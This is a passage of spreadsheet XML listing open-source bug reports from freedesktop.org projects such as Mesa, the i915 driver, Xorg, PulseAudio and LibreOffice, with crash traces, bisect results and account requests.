src/intel/isl/isl_surface_state.c:416: isl_gen7_surf_fill_state_s: Assertion `info-&gt;aux_usage == ISL_AUX_USAGE_NONE' failed.
src/mesa/drivers/dri/i965/brw_wm_surface_state.c:449: brw_update_texture_surface: Assertion `brw-&gt;gen &gt;= 8' failed.</t>
  </si>
  <si>
    <t>DEJAVU-55197</t>
  </si>
  <si>
    <t>CIRCLE WITH LOWER HALF BLACK (U+25D2) and CIRCLE WITH UPPER HALF BLACK (U+25D3) in Sans and Serif are reversed</t>
  </si>
  <si>
    <t>CIRCLE WITH LOWER HALF BLACK (U+25D2) and CIRCLE WITH UPPER HALF BLACK (U+25D3) in Sans and Serif are reversed. They should be swapped.</t>
  </si>
  <si>
    <t>mandel59</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-13885</t>
  </si>
  <si>
    <t>Hi
I'm requesting an account for working on poppler...
Real name: Pino Toscano
Email: pino@kde.org
Preferred account name: pino
Thanks</t>
  </si>
  <si>
    <t>toscano.pino</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-33874</t>
  </si>
  <si>
    <t>New Account Request for Reynaldo Verdejo</t>
  </si>
  <si>
    <t>Created attachment 42902
SSH Key
Real Name: Reynaldo H. Verdejo Pinochet
Email: reynaldo@opendot.cl
Prefered username: reynaldo or rverdejo
For the time being I will be working on the android port.</t>
  </si>
  <si>
    <t>reynaldo</t>
  </si>
  <si>
    <t>LIBREOFFICE-40759</t>
  </si>
  <si>
    <t>GAMMADIST(01b0) must not be always 0</t>
  </si>
  <si>
    <t>Hello
the gamma distribution must be equivalent to an exponential for alpha=1 so the pdf for x=0 must be equal to 1/beta not 0.</t>
  </si>
  <si>
    <t>XCB-20335</t>
  </si>
  <si>
    <t>select() crashes with large file descriptors</t>
  </si>
  <si>
    <t>If you call _xcb_conn_wait or read_block in an application that has more than FD_SETSIZE files already open the select() calls they make will corrupt that stack and crash the app.
This is the old poll() vs select() bug. Replacing select() with poll() fixes it.</t>
  </si>
  <si>
    <t>most</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-12233</t>
  </si>
  <si>
    <t>Real name: Till Maas
Email address: opensource till name
Preferred account name: till
I am comaintaining pm-utils on Fedora now. Therefore it would be easier when I could commit some generic bugfixes and maybe enhancments (e.g. usage of hal quirks -&gt; mailinglist) directly to pm-utils cvs.  I asked Phil Knirsch about this and he agreed.</t>
  </si>
  <si>
    <t>LIBREOFFICE-33751</t>
  </si>
  <si>
    <t>Please update German dictionary</t>
  </si>
  <si>
    <t>In LibreOffice 3.3 there seems to be bundled an old version of the dictionary German (de-DE frami) from May 2010 (2010-05-25). 
The most recent and extended version was released on the 4th of December 2010.
Link: http://extensions.services.openoffice.org/de/project/dict-de_DE_frami
Please update. Thank you.</t>
  </si>
  <si>
    <t>DRI-92099</t>
  </si>
  <si>
    <t>[All regression]System fail to boot up: stopped at fb: switching to inteldrmfb from EFI VGA screen</t>
  </si>
  <si>
    <t>Failed platform: All platforms
Kernel regression: Yes
Description:
Boot up system all systems will fail at: fb: switching to inteldrmfb from EFI VGA screen
Good commit:
commit be4c3386195eae0a1cd49f1d7a634cc1a127a1b4
Author: Daniel Vetter 
Date:   Tue Sep 22 17:18:07 2015 +0200
    drm-intel-nightly: 2015y-09m-22d-15h-17m-30s UTC integration manifest
Bad commit:
commit 4aa7d93732c8354782661783abb27ee08a706c5c
Author: Daniel Vetter 
Date:   Wed Sep 23 17:27:31 2015 +0200
    drm-intel-nightly: 2015y-09m-23d-15h-26m-53s UTC integration manifest</t>
  </si>
  <si>
    <t>MESA-94438</t>
  </si>
  <si>
    <t>[HSW regression bisected] computeparticles demo renders no particles</t>
  </si>
  <si>
    <t>Created attachment 122156
Incorrectly rendered app
On Gen7 and prior the following commit:
commit 38f4c11c2f5c00a1d2addddcd0508ad89a7cead4
Author: Jason Ekstrand 
Date:   Mon Feb 29 17:27:11 2016 -0800
    anv/pipeline: Pull 3DSTATE_SBE into a shared helper
the Sascha Willems computeparticles demo was rendering particles (albeit incorrectly). Now however no particles are rendered and only the gray background is visible.
Reference:
https://github.com/SaschaWillems/Vulkan/blob/master/screenshots/compute_particles.png</t>
  </si>
  <si>
    <t>ACCOUNTSSERVICE-63880</t>
  </si>
  <si>
    <t>Fix up all documentation warnings and complete documentation</t>
  </si>
  <si>
    <t>Some cleanup of the documentation building so it's easier ot see when
adding new stuff if things are undocumented</t>
  </si>
  <si>
    <t>WAYLAND-74222</t>
  </si>
  <si>
    <t>Lowered fullscreen surfaces get other unrelated surfaces between the fullscreen surface and its black view</t>
  </si>
  <si>
    <t>To reproduce this you need a client which can go fullscreen but won't cover the whole screen - that's what the black view is there for.
Steps to reproduce:
Launch some random client (e.g. weston-terminal)
Launch the client as specified above and make it fullscreen
Mod+tab to go to the first client. Mod+tab to go back to the fullscreen client
At this point you expect the fullscreen client to be on the screen with the black view right behind it covering what the client doesn't. However what you'll have is: [ fullscreen client ] [ other client ] [ black view ].
In the video I launch gnome-terminal and make it fullscreen with mod-shift-f.
This is a problem related to lower_fullscreen_layer never being reversed I'll send a patch to the list in a bit.</t>
  </si>
  <si>
    <t>TELEPATHY-27672</t>
  </si>
  <si>
    <t>telepathy-butterfly crashed with NotImplementedError in __init__()</t>
  </si>
  <si>
    <t>The bug has been opened on https://bugs.launchpad.net/ubuntu/+source/telepathy-butterfly/+bug/561800
I installed the upgrade packages from today.
Initialized Empathy and it just dropped this error.
telepathy-butterfly 0.5.8-1ubuntu1
Traceback (most recent call last):
  File /usr/lib/pymodules/python2.6/papyon/msnp/base.py line 107 in _dispatch_command
    handler(command)
  File /usr/lib/pymodules/python2.6/papyon/msnp/notification.py line 453 in _handle_NLN
    urllib.unquote(command.arguments[idx]))
  File /usr/lib/pymodules/python2.6/papyon/p2p.py line 172 in parse
    result = MSNObject(creator size type location friendly shad shac)
  File /usr/lib/pymodules/python2.6/papyon/p2p.py line 107 in __init__
    raise NotImplementedError
NotImplementedError
http://launchpadlibrarian.net/44261326/butterfly-log.txt.tar.gz
...
If you think I have deleted too much things I can sent it to you directly</t>
  </si>
  <si>
    <t>XORG-14584</t>
  </si>
  <si>
    <t>Keyboard VT switch not working</t>
  </si>
  <si>
    <t>Created attachment 14448
Config file
First of all I bisected the symptoms described below to be caused by commit fbd776894658e7afb2c55dc8582b2a3efab78a3c (XKB: Ditch XkbFileInfo). Reverting just that commit against current master makes things work as expected.
The first symptom is that ctrl-alt-Fx fails to switch to console.
The second symptom is weirder and may be harder to reproduce. The following recipe worked for me every time but it may depend on some settings of mine: Start X with
 xinit $(which xterm)
In the xterm run
 gnome-settings-daemon &amp;
 compiz &amp;
Maximize the xterm window and start typing 'gnome-keyboard-properties' (I wanted to check if the first symptom was related to XKB configuration - it's not BTW). Somewhere around the first 'e' or '-' the X server terminates without any indication of a crash or other problem.
I'm attaching my rather messy xorg.conf in case it matters. Let me know if you need something else - FWIW the log file seems identical with or without that commit.</t>
  </si>
  <si>
    <t>OPENCLIPART.ORG-3596</t>
  </si>
  <si>
    <t>RFE: RSS feed of incoming clipart</t>
  </si>
  <si>
    <t>It would be great to provide an RSS feed of new SVG's submitted by people. That
way we could have artcasting right. This would be a great! 
Similarly we could provide a daily RSS artcast that included a featured clip art.</t>
  </si>
  <si>
    <t>PULSEAUDIO-80867</t>
  </si>
  <si>
    <t>Pulseaudio dies when using mmkbd-evdev and the input device is unplugged</t>
  </si>
  <si>
    <t>With the mmkbd-evdev module enabled e.g. like so in ~/.pulse/default:
  load-module module-mmkbd-evdev device=/dev/input/by-id/usb-0430_Sun_USB_Keyboard-event-kbd
pulseaudio crashes when that keyboard is unplugged.  The following messages
are logged to syslog:
  Jul 3 19:21:17 hostname pulseaudio[11515]: [pulseaudio] module-mmkbd-evdev.c:
  Lost connection to evdev device.
  Jul 3 19:21:17 hostname pulseaudio[11515]: [pulseaudio] module-mmkbd-evdev.c:
  Assertion 'pa_close(u-&gt;fd) == 0' failed at modules/module-mmkbd-evdev.c:260
  function module_mmkbd_evdev_LTX_pa__done(). Aborting.
I would guess that the fd has already been closed and close(2) returns EBADF
to pa_close().</t>
  </si>
  <si>
    <t>sb-fdbugs</t>
  </si>
  <si>
    <t>DRI-109373</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@kms_invalid_dotclock - dmesg-warn - Missing case (lane_count == 0)</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5430/shard-glk2/igt@kms_invalid_dotclock.html
 [1932.700896] [drm:intel_hdmi_compute_config [i915]] picking bpc to 8 for HDMI output
 [1932.701176] [drm:intel_hdmi_compute_config [i915]] forcing pipe bpp to 24 for HDMI
 [1932.701400] [drm:intel_hdmi_compute_config [i915]] unsupported HDMI clock rejecting mode
 [1932.701406] ------------[ cut here ]------------
 [1932.701409] Missing case (lane_count == 0)
 [1932.701503] WARNING: CPU: 0 PID: 5239 at drivers/gpu/drm/i915/intel_dpio_phy.c:581 bxt_ddi_phy_calc_lane_lat_optim_mask+0x3d/0x50 [i915]
 [1932.701506] Modules linked in: vgem snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic btusb btrtl btbcm x86_pkg_temp_thermal coretemp btintel crct10dif_pclmul bluetooth crc32_pclmul ghash_clmulni_intel ecdh_generic realtek i2c_i801 r8169 i915 i2c_hid snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm mei_me pinctrl_geminilake pinctrl_intel mei prime_numbers
 [1932.701533] CPU: 0 PID: 5239 Comm: kms_invalid_dot Tainted: G     U            5.0.0-rc2-CI-CI_DRM_5430+ #1
 [1932.701536] Hardware name: Intel Corporation NUC7CJYH/NUC7JYB BIOS JYGLKCPX.86A.0027.2018.0125.1347 01/25/2018
 [1932.701594] RIP: 0010:bxt_ddi_phy_calc_lane_lat_optim_mask+0x3d/0x50 [i915]
 [1932.701597] Code: 00 74 33 31 c0 40 80 ff 01 74 2b 48 83 ec 08 40 0f b6 d7 48 c7 c6 6a 5e 25 a0 48 c7 c7 75 5e 25 a0 88 44 24 07 e8 23 3c f0 e0  0b 0f b6 44 24 07 48 83 c4 08 c3 f3 c3 0f 1f 44 00 00 41 56 41
 [1932.701600] RSP: 0018:ffffc90000b43a68 EFLAGS: 00010282
 [1932.701604] RAX: 0000000000000000 RBX: ffff8882742f9bf8 RCX: 0000000000000000
 [1932.701606] RDX: 0000000000000007 RSI: ffffffff820cb679 RDI: 00000000ffffffff
 [1932.701608] RBP: ffff8882627c0000 R08: 000000000ed29d71 R09: 0000000000000000
 [1932.701611] R10: 0000000000000009 R11: 0000000000000000 R12: 00000000ffffffea
 [1932.701613] R13: ffff88826e846678 R14: 0000000000000000 R15: ffff8882723353d8
 [1932.701616] FS:  00007f9795db7980(0000) GS:ffff888277e00000(0000) knlGS:0000000000000000
 [1932.701619] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 [1932.701621] CR2: 00007feea8f0e100 CR3: 000000023158a000 CR4: 0000000000340ef0
 [1932.701623] Call Trace:
 [1932.701682]  intel_ddi_compute_config+0x76/0x80 [i915]
 [1932.701741]  intel_atomic_check+0x39a/0x11c0 [i915]
 [1932.701752]  ? _raw_spin_unlock_irqrestore+0x4c/0x60
 [1932.701759]  drm_atomic_check_only+0x557/0x7f0
 [1932.701768]  drm_atomic_commit+0xe/0x50
 [1932.701773]  drm_atomic_helper_set_config+0x7b/0x90
 [1932.701778]  drm_mode_setcrtc+0x192/0x6e0
 [1932.701799]  ? drm_mode_getcrtc+0x180/0x180
 [1932.701806]  drm_ioctl_kernel+0x81/0xf0
 [1932.701813]  drm_ioctl+0x2f3/0x3b0
 [1932.701818]  ? drm_mode_getcrtc+0x180/0x180
 [1932.701838]  do_vfs_ioctl+0xa0/0x6e0
 [1932.701843]  ? lock_acquire+0xa6/0x1c0
 [1932.701849]  ? __task_pid_nr_ns+0xb9/0x1f0
 [1932.701856]  ksys_ioctl+0x35/0x60
 [1932.701862]  __x64_sys_ioctl+0x11/0x20
 [1932.701867]  do_syscall_64+0x55/0x190
 [1932.701871]  entry_SYSCALL_64_after_hwframe+0x49/0xbe
 [1932.701874] RIP: 0033:0x7f97954685d7
 [1932.701878] Code: b3 66 90 48 8b 05 b1 48 2d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05  3d 01 f0 ff ff 73 01 c3 48 8b 0d 81 48 2d 00 f7 d8 64 89 01 48
 [1932.701880] RSP: 002b:00007ffe0d37ea38 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
 [1932.701883] RAX: ffffffffffffffda RBX: 00007ffe0d37ea70 RCX: 00007f97954685d7
 [1932.701886] RDX: 00007ffe0d37ea70 RSI: 00000000c06864a2 RDI: 0000000000000005
 [1932.701888] RBP: 00007ffe0d37ea70 R08: 0000000000000000 R09: 00005559774104d8
 [1932.701891] R10: 00007ffe0d37eb40 R11: 0000000000000246 R12: 00000000c06864a2
 [1932.701893] R13: 0000000000000005 R14: 0000000000000000 R15: 0000000000000000
 [1932.701908] irq event stamp: 64410
 [1932.701912] hardirqs last  enabled at (64409): [] console_unlock+0x3fe/0x600
 [1932.701915] hardirqs last disabled at (64410): [] trace_hardirqs_off_thunk+0x1a/0x1c
 [1932.701919] softirqs last  enabled at (64386): [] __do_softirq+0x33a/0x4b9
 [1932.701924] softirqs last disabled at (64373): [] irq_exit+0xd1/0xe0
 [1932.701981] WARNING: CPU: 0 PID: 5239 at drivers/gpu/drm/i915/intel_dpio_phy.c:581 bxt_ddi_phy_calc_lane_lat_optim_mask+0x3d/0x50 [i915]
 [1932.701984] ---[ end trace 1a76dbad6a1a52e7 ]---</t>
  </si>
  <si>
    <t>DRI-100111</t>
  </si>
  <si>
    <t>[SKL] i915_gem_object_sync unable to handle kernel NULL pointer dereference and system lockup returning from suspend</t>
  </si>
  <si>
    <t>I sporadically get complete system lockups with the following stack on kernel 4.10 when trying to return from suspend:
BUG: unable to handle kernel NULL pointer dereference at           (null)
IP: []           (null)
PGD 2fd54c067 PUD 2fd6bd067 PMD 0 
Oops: 0010 [#1] SMP 
Modules linked in: tun ctr ccm fuse snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_codec_generic snd_soc_skl snd_soc_skl_ipc snd_hda_ext_core snd_soc_sst_ipc snd_soc_sst_dsp snd_soc_core snd_compress snd_pcm_dmaengine ac97_bus iTCO_wdt dw_dmac_core iTCO_vendor_support intel_rapl iosf_mbi x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel arc4 kvm irqbypass joydev mousedev iwlmvm mac80211 snd_hda_intel snd_hda_codec e1000e iwlwifi psmouse evdev input_leds snd_hda_core mac_hid snd_hwdep snd_pcm ptp pps_core i2c_i801 i915 cfg80211 snd_timer rtsx_pci_ms memstick shpchp drm_kms_helper drm intel_gtt syscopyarea sysfillrect sysimgblt mei_me fb_sys_fops mei i2c_algo_bit thinkpad_acpi nvram snd soundcore led_class thermal rfkill battery ac video fjes wmi tpm_tis tpm button processor sch_fq_codel
 vboxnetflt(O) vboxnetadp(O) pci_stub vboxpci(O) vboxdrv(O) netatop(O) ip_tables x_tables ext4 crc16 mbcache jbd2 jitterentropy_rng sha256_ssse3 sha256_generic hmac drbg ansi_cprng algif_skcipher af_alg hid_multitouch hid_generic usbhid hid dm_crypt dm_mod sd_mod rtsx_pci_sdmmc mmc_core serio_raw atkbd libps2 crct10dif_pclmul crc32_pclmul crc32c_intel aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd xhci_pci xhci_hcd ahci usbcore libahci libata rtsx_pci scsi_mod usb_common i8042 serio
CPU: 3 PID: 6475 Comm: firefox Tainted: G     U  W  O    4.4.52-1-lts44 #1
Hardware name: LENOVO 20FAS22V05/20FAS22V05 BIOS N1CET43W (1.11 ) 04/14/2016
task: ffff8802937c1d80 ti: ffff8802e54bc000 task.ti: ffff8802e54bc000
RIP: 0010:[]  []           (null)
RSP: 0018:ffff8802e54bfb00  EFLAGS: 00010282
RAX: ffff8802e54bfbc8 RBX: ffff8800b41983c0 RCX: 000000000004e545
RDX: 000000000004e545 RSI: ffff88030f8920d8 RDI: ffff8800b4198540
RBP: ffff8802e54bfb88 R08: ffff88030e6d9498 R09: 0000000000000000
R10: 00000000000000a0 R11: ffff8800b4198540 R12: 0000000000000001
R13: ffff88030f894568 R14: ffff88030f8920d8 R15: 0000000000000000
FS:  00007fc5702e0740(0000) GS:ffff8803214c0000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000000 CR3: 00000002e5588000 CR4: 00000000003406e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Stack:
 ffffffffa0667b19 0000000000004000 ffff88030f8920dc 0004e545810654a7
 ffff8802e54bfbc8 ffff8800b45c9680 ffff8800b41983c0 ffff88030f890000
 ffff8802d1ea4480 ffff88030f894578 ffff88030f890000 0000000088b36159
Call Trace:
 [] ? i915_gem_object_sync+0x1a9/0x310 [i915]
 [] intel_execlists_submission+0x1cd/0x420 [i915]
 [] i915_gem_do_execbuffer.isra.13+0x1374/0x1410 [i915]
 [] ? __alloc_pages_nodemask+0x14c/0xaa0
 [] ? ttwu_do_activate.constprop.35+0x5d/0x70
 [] i915_gem_execbuffer2+0xd4/0x240 [i915]
 [] drm_ioctl+0x152/0x540 [drm]
 [] ? i915_gem_execbuffer+0x320/0x320 [i915]
 [] do_vfs_ioctl+0x2a9/0x4b0
 [] ? __do_page_fault+0x193/0x420
 [] SyS_ioctl+0x79/0x90
 [] entry_SYSCALL_64_fastpath+0x12/0x6d
Code:  Bad RIP value.
RIP  []           (null)
 RSP 
CR2: 0000000000000000
---[ end trace 58fb3e8de972d5d8 ]---
To try and mitigate this I tried to disable execlist support with i915.enable_execlists=0 on the kernel command line but this seems to not have any effect?
% sudo cat /sys/module/i915/parameters/enable_execlists
1
% grep -o 'i915.\S\+' /proc/cmdline
i915.enable_execlists=0
This is with the following hardware (a Lenovo T460s):
00:00.0 0600: 8086:1904 (rev 08)
00:02.0 0300: 8086:1916 (rev 07)
00:08.0 0880: 8086:1911
00:14.0 0c03: 8086:9d2f (rev 21)
00:14.2 1180: 8086:9d31 (rev 21)
00:16.0 0780: 8086:9d3a (rev 21)
00:16.3 0700: 8086:9d3d (rev 21)
00:17.0 0106: 8086:9d03 (rev 21)
00:1c.0 0604: 8086:9d10 (rev f1)
00:1c.2 0604: 8086:9d12 (rev f1)
00:1f.0 0601: 8086:9d48 (rev 21)
00:1f.2 0580: 8086:9d21 (rev 21)
00:1f.3 0403: 8086:9d70 (rev 21)
00:1f.4 0c05: 8086:9d23 (rev 21)
00:1f.6 0200: 8086:156f (rev 21)
02:00.0 ff00: 10ec:522a (rev 01)
04:00.0 0280: 8086:24f3 (rev 3a)
vendor_id	: GenuineIntel
cpu family	: 6
model		: 78
model name	: Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz
stepping	: 3
microcode	: 0x88</t>
  </si>
  <si>
    <t>POPPLER-11522</t>
  </si>
  <si>
    <t>poppler doesn't tolerate garbage after the last %%EOF acroread does</t>
  </si>
  <si>
    <t>The attached PDF (and every other PDF available from the US FCC OET site) opens and displays fine in acroread but fails in Evince with poppler-0.5.4-7.fc7.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-87326</t>
  </si>
  <si>
    <t>New account request to be able to push to Mesa and Piglit</t>
  </si>
  <si>
    <t>Hi
with my Klocwork and other patches I think I should ask for push access into Mesa and Piglit. I'd prefer my new account to have name 'jheikkil'
Thank you.
/Juha-Pekka HeikkilÃ¤</t>
  </si>
  <si>
    <t>MESA-18430</t>
  </si>
  <si>
    <t>[GEM i915/945GM] glxgears is just black on Mac</t>
  </si>
  <si>
    <t>Created attachment 20135
maximized glxgears
My glxgears is just black only when I maximize the glxgears window a see a small flickering green part. It works fine with non-gem kernel without any changes.
I am using anholts drm-intel-next (2db46b5668dfed59acacd75dfc49ecf947ea5aeb)
xf86-video-intel-2.5.0
mesa branch intel-2008-q3 (8f8892525a560b0e68780d58a1e127b304a31e8b)
xorg-server-1.5.2
libdrm-2.4.0</t>
  </si>
  <si>
    <t>MESA-22225</t>
  </si>
  <si>
    <t>[945G/GZ KMS] Xorg hangs when video is full-screened</t>
  </si>
  <si>
    <t>Created attachment 26658
Xorg log with Mode Debug enabled
Running with KMS enabled X will hang when I attempt to fullscreen an mplayer/totem video playing. It seems to be stuck in an ioctl in libdrm.
-- chipset:  Intel Corporation 82945G/GZ Integrated Graphics Controller (rev 02)
-- system architecture: x86_64
-- xf86-video-intel: 2.7.1
-- xserver: 1.6.1.901-r3
-- mesa: 7.4.2
-- libdrm: 2.4.11
-- kernel: 2.6.30-rc8-intel-drm-00023-g34c8638 (intel-drm-next tree)
-- Linux distribution: Gentoo
-- Machine or mobo model: Efficient PC ASUS (ICH7)
-- Display connector: LVDS/DVI
Reproducing steps:
Play a video with mplayer and hit f to full screen the display
Additional info:
I noticed that the GDM start-up looks a little odd. While full screen is enabled the graphics only fit in the top left 3/4s of the screen as though GDM is confused about the screen resolution.</t>
  </si>
  <si>
    <t>MESA-67692</t>
  </si>
  <si>
    <t>[llvmpipe] piglit glsl-fs-frontfacing regression</t>
  </si>
  <si>
    <t>mesa: bff0d87668538196a2d3ef1400382e4deb0e0435 (master)
$ ./bin/shader_runner tests/shaders/glsl-fs-frontfacing.shader_test -auto
Probe color at (00)
  Expected: 0.000000 1.000000 0.000000 0.000000
  Observed: 0.000000 0.501961 0.501961 0.000000
Probe color at (2490)
  Expected: 0.000000 1.000000 0.000000 0.000000
  Observed: 0.000000 0.501961 0.501961 0.000000
PIGLIT: {'result': 'fail' }
2d15f4746ba4c5d0146912550442b96386e4a32d is the first bad commit
commit 2d15f4746ba4c5d0146912550442b96386e4a32d
Author: Zack Rusin 
Date:   Fri Aug 2 15:50:16 2013 -0400
    llvmpipe: make the front-face behavior match the gallium spec
    The spec says that front-face is true if the value is &gt;0 and false
    if it's &lt;0. To make sure that we follow the spec lets just
    subtract 0.5 from our value (llvmpipe did 1 for frontface and 0
    otherwise) which will get us a positive num for frontface and
    negative for backface.
    Signed-off-by: Zack Rusin 
    Reviewed-by: Roland Scheidegger 
    Reviewed-by: Jose Fonseca 
:040000 040000 2ada90b3a1da549c955add2ee247bf564f4964b8 f47d0cb938eee9fb413f71518c6afa1ad9fce5b9 M	src
bisect run success</t>
  </si>
  <si>
    <t>MODEMMANAGER-86713</t>
  </si>
  <si>
    <t>novatel: improve probing for Dell branded modems</t>
  </si>
  <si>
    <t>Dell rebrands modems from different vendors including Novatel Sierra and Ericsson. Until now we defaulted to the Novatel plugin when a Dell device was found but then we're breaking newer MBIM Sierra Dell-branded modems as we don't have MBIM support in the Novatel plugin.
So we should try to improve the probing in the Novatel Sierra and MBM plugins so that they probe also Dell devices and we'll then try to match via AT-probing which plugin should be handling the Dell device.
Quoting Dan:
The case we care about for Novatel is AT-only devices.  For those here
is a list of commands we can use to identify them and some sample
replies.  Built from the XU870 (Dell Wireless 5510) EX725 S720 E362.
We should only do this probing if the following are true:
1) The device only has AT ports eg it does *not* have any QMI MBIM or
net ports
2) The device does *not* report LTE capabilities via ATI or GCAP
Early Novatel QMI-capable devices (like the E362) support these commands
(at$nw*) but of course we don't want to treat them as AT-only Novatel.
=======
ati1
Manufacturer: Novatel Wireless Incorporated
Manufacturer: NOVATEL WIRELESS INCORPORATED
AT+GMI
Novatel Wireless Incorporated
NOVATEL WIRELESS INCORPORATED
at$nwdegc   (GSM/UMTS only)
(non-error response sufficient)
=======
If for some reason those don't work here are some more esoteric ones
that we could potentially use:
AT$NWHFP?   (gsm only)
AT$NWCSQ    (gsm only)
AT$NWWDIS?  (gsm only)
AT$NWERR?   (gsm only)
AT$NWCFT?   (gsm only)
AT$NWRAT?   (gsm only)
AT$NWLTIME  (cdma only)
at$nwrssi   (cdma only)
More context in the ML:
http://lists.freedesktop.org/archives/modemmanager-devel/2014-November/001636.html</t>
  </si>
  <si>
    <t>DBUS-7160</t>
  </si>
  <si>
    <t>dbus-0.61 build fixes</t>
  </si>
  <si>
    <t>I'm attaching a patch which fixes a few issues building dbus-0.61 including one
where builddir != srcdir.</t>
  </si>
  <si>
    <t>DBUS-7810</t>
  </si>
  <si>
    <t>dbus-daemon only checks for valid username after daemon fork</t>
  </si>
  <si>
    <t>dbus-daemon 0.91 only checks for a valid username after being forked and with
default configuration the error message went to /dev/null. Maybe check before
the fork stage and a more visible error message (syslog?)?</t>
  </si>
  <si>
    <t>LIBREOFFICE-60754</t>
  </si>
  <si>
    <t>V 1.0.2: Impress Remote UI is not localized in Turkish</t>
  </si>
  <si>
    <t>Hi
Android Impress Remote App's user interface is in English whether the locale is in Turkish the app still shows the UI in English.
Tested on:
Samsung Galaxy S3 Android 4.0.4
Samsung Nexus Android 4.2.1.
UI translaion is fully translated in Pootle: https://translations.documentfoundation.org/tr/libo_ui/android/sdremote/res/values.po/translate/ 
Best regards
Zeki</t>
  </si>
  <si>
    <t>kobzeci</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-90834</t>
  </si>
  <si>
    <t>Please update my GPG key</t>
  </si>
  <si>
    <t>Hi
please update my GPG key. The old one is still valid and not compromised but I switched to a bigger one.
You can find it here:
http://pgp.surfnet.nl:11371/pks/lookup?op=get&amp;search=0x86C2D7B5
Note that it's also signed by my old key but let me know if you also wanted some statement signed with my old key.</t>
  </si>
  <si>
    <t>XORG-84770</t>
  </si>
  <si>
    <t>Typo in src/radeon_dri2.c</t>
  </si>
  <si>
    <t>Created attachment 107530
patch
it seems a copy/paste error.
sorry if i was wrong.</t>
  </si>
  <si>
    <t>tanahqua-bz</t>
  </si>
  <si>
    <t>SYNCEVOLUTION-52700</t>
  </si>
  <si>
    <t>Need to check for alternative names to the qmake binary</t>
  </si>
  <si>
    <t xml:space="preserve">
---- Reported by blixtra@gmail.com 2011-05-17 15:00:41 +0000 ----
Created attachment 6514
Patch to check for alternative namings for qmake
On some distros such as Fedora qmake is called qmake-qt4. This is currently hardcoded to qmake in syncevolution.
Attached is a patch to check for the alternative name.
---- Additional Comments From murrayc@murrayc.com 2011-06-30 08:55:30 +0000 ----
Looks good to me and it's useful to me too.
---- Additional Comments From patrick.ohly@intel.com 2011-07-05 13:49:28 +0000 ----
Merged thanks.
--- Bug imported by patrick.ohly@gmx.de 2012-07-29 20:36 UTC  ---
This bug was previously known as _bug_ 17704 at https://bugs.meego.com/show_bug.cgi?id=17704
Imported an attachment (id=64850)
</t>
  </si>
  <si>
    <t>PULSEAUDIO-100766</t>
  </si>
  <si>
    <t>Croatian translation for Pulseaudio</t>
  </si>
  <si>
    <t>Created attachment 130993
Patch file</t>
  </si>
  <si>
    <t>trebelnik2</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-18856</t>
  </si>
  <si>
    <t>git commit access for xf86-video-ati</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Id like to be added to the x.org/xf86-video-ati project so that I can commit directly to xf86-video-ati. Ive been contributing patches for AGP quirks and other stuff via bugzilla and Alex asked that I commit quirks directly.  (I will probably continue to post more significant patches to bugzilla.)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFJNd7bEaMBVuDmdhERAlXoAJ9jYs/STlts0J9dn+ih89oqd1TZbgCguQd4
CM39HpOfKBabFXLlkV/6mZg=
=2L9k
-----END PGP SIGNATURE-----</t>
  </si>
  <si>
    <t>LIBREOFFICE-46258</t>
  </si>
  <si>
    <t>EasyHack: remove obsolete 'isTestTool'  from vcl ...</t>
  </si>
  <si>
    <t>VCL used to have code to adapt to the presence of the test-tool that it used to run under. This is now gone forever so we should strip it out:
git grep mbIsTestTool
and rip/replace all it's dependents - it should be always false.
Thanks :-)</t>
  </si>
  <si>
    <t>josh.sickmate</t>
  </si>
  <si>
    <t>MESA-101874</t>
  </si>
  <si>
    <t>Vulkan regressions from mesa bf24c3539</t>
  </si>
  <si>
    <t>src/intel/vulkan/anv_blorp.c:570: do_buffer_copy: Assertion `surf.row_pitch == width * block_size' failed. 
Triggered by series ending in:
bf24c3539e4b6989512968cae12da2f88d2c53e9
Author:     Topi Pohjolainen 
i965/miptree: Clean-up unused
dEQP-VK.api.copy_and_blit.core.buffer_to_buffer.partial
dEQP-VK.api.copy_and_blit.core.buffer_to_buffer.regions
dEQP-VK.api.copy_and_blit.dedicated_allocation.buffer_to_buffer.partial
dEQP-VK.api.copy_and_blit.dedicated_allocation.buffer_to_buffer.regions
dEQP-VK.api.fill_and_update_buffer.dedicated_alloc.update_buffer_first_one
dEQP-VK.api.fill_and_update_buffer.suballocation.update_buffer_first_one
dEQP-VK.api.fill_and_update_buffer.suballocation.update_buffer_second_one
dEQP-VK.pipeline.timestamp.transfer_tests.host_stage_with_update_buffer_method
dEQP-VK.pipeline.timestamp.transfer_tests.transfer_stage_with_update_buffer_method
crucible:
func.sync.semaphore-fd.sanity</t>
  </si>
  <si>
    <t>DRI-86095</t>
  </si>
  <si>
    <t>[ILK]igt/kms_mmio_vs_cs_flip/setplane_vs_cs_flip sporadically causes system hang</t>
  </si>
  <si>
    <t>Created attachment 109194
dmesg
==System Environment==
--------------------------
Regression: not sure 
Non-working platforms: ILK
==kernel==
--------------------------
drm-intel-fixes/dc54e76d12f2b9ee32f8f4bc7ade79dbc7e6e55c
==Bug detailed description==
It causes system hang on ILK with -fixes kernel it happens 3 in 5 runs. 
output:
